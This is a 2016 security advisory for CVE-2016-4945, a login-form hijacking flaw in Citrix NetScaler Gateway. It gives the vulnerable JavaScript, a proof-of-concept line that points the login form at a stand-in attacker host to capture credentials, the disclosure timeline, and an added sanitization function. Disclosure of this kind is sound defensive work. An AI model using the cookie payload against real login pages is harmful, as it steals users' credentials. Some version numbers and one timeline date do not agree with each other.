[CVE-2016-4945] Login Form Hijacking Vulnerability in Citrix NetScaler Gateway May 27 2016 08:25PM
Daniel Schliebner (DSchliebner persicon com)
PERSICON Security Advisory
Title: Login Form Hijacking vulnerability
Product: Citrix Netscaler
Vulnerable Version: 11.0 Build 64.35
Fixed Version: 11.0 Build 66.11
CVE-ID: CVE-2016-4945
Impact: medium
found: 2015-04-07
by: Dr. Daniel Schliebner <dschliebner (at) persicon (dot) com>

Vendor Description:
"Citrix (NASDAQ:CTXS) aims to power a world where people, organizations
and things are securely connected and accessible to make the
extraordinary possible. Its technology makes the world's apps and
data secure and easy to access, empowering people to work anywhere
and at any time. Citrix provides a complete and integrated portfolio
of Workspace-as-a-Service, application delivery, virtualization, mobility,
network delivery and file sharing solutions that enables IT to ensure
critical systems are securely available to users via the cloud or
on-premise and across any device or platform. With annual revenue
in 2015 of $3.28 billion, Citrix solutions are in use by more than
400,000 organizations and over 100 million users globally."

Vulnerability Description:
The login page of the Citrix Netscaler Gateway web frontend is
vulnerable to a DOM-based Cross-Site-Scripting (XSS) vulnerability due
to improper sanitization of the content of the "NSC_TMAC" cookie.

The vulnerability is located in the file


in which the cookie's content, if set, is written to the DOM
via JavaScript. This is done in the following excerpt:

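    // The cookie value is attacker-influenceable and is used unvalidated.
    var cookie_action = ns_getcookie("NSC_TMAC");
    var action_url = '/cgi/login';
    if (cookie_action) {
        // The default form action is replaced by the raw cookie content.
        action_url = cookie_action;
    }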

This vulnerability can be exploited by an unauthorized remote attacker
by forging the destination address of the login form in order to
receive the login credentials of a victim. This can be achieved, for
example, by using another XSS vulnerability on the company's web page.

Proof of concept:
Assume this vulnerability resides on https://my-foobar-company.com/vpn/.
Assume further that an attacker is able to set a cookie on a victim's
client via some other attack vector, e.g. another XSS vulnerability.

The attacker needs to first (e.g. by XSS) execute the following code
on the client:

document.cookie='NSC_TMAC=https://attack.ers/receive/;' +
' domain=.my-foobar-company.com';

As a consequence, the Netscaler Gateway login form has the URL
"https://attack.ers/receive/" as the value of its "action" attribute,
and hence a victim will send their credentials to the attacker's
host when submitting the form.

Vulnerable / tested versions:
Citrix Netscaler 11.0 Build 65.31
Citrix Netscaler 11.0 Build 64.34

Vendor contact timeline:
2016-04-11: Contacting vendor through secure (at) citrix (dot) com
2015-04-11: Vendor response - issue has now the case ID CASE-6597
and will be forwarded for feedback
2016-04-12: Vendor response - issue will be reviewed
2016-04-25: Vendor response - issue will be fixed
2016-05-24: Vendor response - issue is fixed in the upcoming
release on 26th May
2016-05-26: Vendor response - issue is fixed in the upcoming
release at 5pm PDT on 26th May
2016-05-27: Status update - fix released by vendor
2016-05-27: Coordinated release of the security advisory

Remove the use of the cookie content or sanitize its content properly
before writing it to the DOM.
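
One way to implement the sanitization recommended above, as an added
example that is not Citrix's code and not part of the original advisory.
The function name safeLoginAction, the "/cgi/" path allowlist and the
sample paths in the comments are assumptions made for illustration.

```javascript
// Added example (hypothetical helper, not vendor code).
// Derives a form action from an untrusted cookie value and falls back
// to the fixed default unless the value is a same-origin, allowlisted path.
const DEFAULT_ACTION = '/cgi/login';

function safeLoginAction(cookieValue, pageOrigin, allowedPrefixes = ['/cgi/']) {
  if (typeof cookieValue !== 'string' || cookieValue === '') {
    return DEFAULT_ACTION;
  }
  // Control characters and backslashes are normalised by URL parsers in
  // ways that can turn an innocent-looking value into another host.
  if (/[\u0000-\u001f\u007f\\]/.test(cookieValue)) {
    return DEFAULT_ACTION;
  }
  let url;
  try {
    // Resolve exactly as the browser would resolve a form "action".
    url = new URL(cookieValue, pageOrigin);
  } catch (e) {
    return DEFAULT_ACTION;
  }
  // Absolute URLs, protocol-relative URLs ("//host/") and non-HTTP
  // schemes all end up with an origin different from the page's own.
  if (url.origin !== pageOrigin) {
    return DEFAULT_ACTION;
  }
  // Check the normalised path, so "/cgi/../x" cannot pass the allowlist.
  if (!allowedPrefixes.some((p) => url.pathname.startsWith(p))) {
    return DEFAULT_ACTION;
  }
  // Emit a relative URL only; the host is never taken from the cookie.
  return url.pathname + url.search;
}

// In the login page this would replace the direct assignment, e.g.:
//   action_url = safeLoginAction(ns_getcookie("NSC_TMAC"),
//                                window.location.origin);
```

With this check the cookie value from the proof of concept resolves to a
foreign origin and the form keeps its default action.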

[1] http://support.citrix.com/article/CTX213313
